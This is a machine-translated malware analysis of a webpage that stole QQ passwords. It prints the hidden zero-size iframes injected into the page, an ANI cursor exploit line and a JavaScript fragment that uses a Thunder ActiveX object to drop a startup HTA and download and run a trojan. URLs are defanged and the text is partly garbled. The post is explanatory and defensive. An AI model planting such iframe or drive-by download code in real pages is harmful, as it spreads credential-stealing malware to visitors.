EndurerOriginal
1Version
One user reported that he used Baidu to search for music. After he opened the link webpage in the search result, his QQ number was stolen ~
BTW. sogou is used for music searching ~
Check the webpage provided by netizens and find the webpage contains code:
/---
<IFRAME src = 'hxxp: // W **. c ** yshop.net/gg.html? Id = 101 'width = 0 Height = 0> </iframe>
---/
Hxxp: // W **. c ** yshop.net/gg.html? Id = 101Contains three malicious codes.
1. Content of US-ASCII Encoding
Download the http://purpleendurer.ys168.com decoder to the US-ASCII for decoding and get a piece of HTML code:
/---
<Body style = 'cursor: URL (hxxp: // * Q *. 16 *** 80*8 * 0.com/#js) '>
</Body>
---/
W. jsUse the ani vulnerability to download hxxp: // W **. d ** zy5 *** unzip com/0.exe
File Description: D:/test/0.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 21:55:38
Modification time: 21:55:44
Access time:
Size: 22807 bytes, 22.279 KB
MD5: 08a5179fc115b3ace5c9a4ac55ed4c44
Kaspersky reportsTrojan-PSW.Win32.Delf.qcThe rising report isTrojan. psw. win32.qqpass. QIS
Ii. HTML code:
/---
<IFRAME src = "hxxp: // Q **. Z ** p * X5 ** 2 * 0.com/1.htm" width = 0 Height = 0> </iframe>
---/
1. htmThe content uses the US-ASCII encoding, decoding, get a piece of JavaScript code, the function is also download ghost this 0.exe
Iii. HTML code:
/---
<IFRAME src = "hxxp: // Q **. Z ** p * X5 ** 2 * 0.com/vip.htm" width = 0 Height = 0> </iframe>
---/
Hxxp: // Q **. Z ** p * X5 ** 2 * 0.com/vip.htmContent:
/---
<SCRIPT src = "VIP. js"> </SCRIPT>
<Body onload = shit ();> <br>
---/
Shit () is defined in VIP. JS:
/---
Function shit ()
{
Try {qianxu_fan = new activexobject ("thunderserver. webthunder.1 ");}
Catch (e) {return ;}
---/
Used to create ActiveX Object: thunderserver. webthunder.1.
VIP. jsImplementation using it:
Use ADODB to create a file: C:/Documents and Settings/all users/Start Menu/Program/start/Microsofts. HTA
Use shell. Run to call IE to open the webpage hxxp: // Q **. d ** Z ** y ** 5 *** unzip com/vips.htmand download the Virus File vip.exe
Use shell.execto run the Virus File vip5111).exe that is downloaded to the IE folder.
Hxxp: // Q **. D * z ** y ** 5 *** restart com/vips.htmCode included:
/---
<SCRIPT src = "vip.exe"> </SCRIPT>
---/
Vip.exe is the same as 0.exe.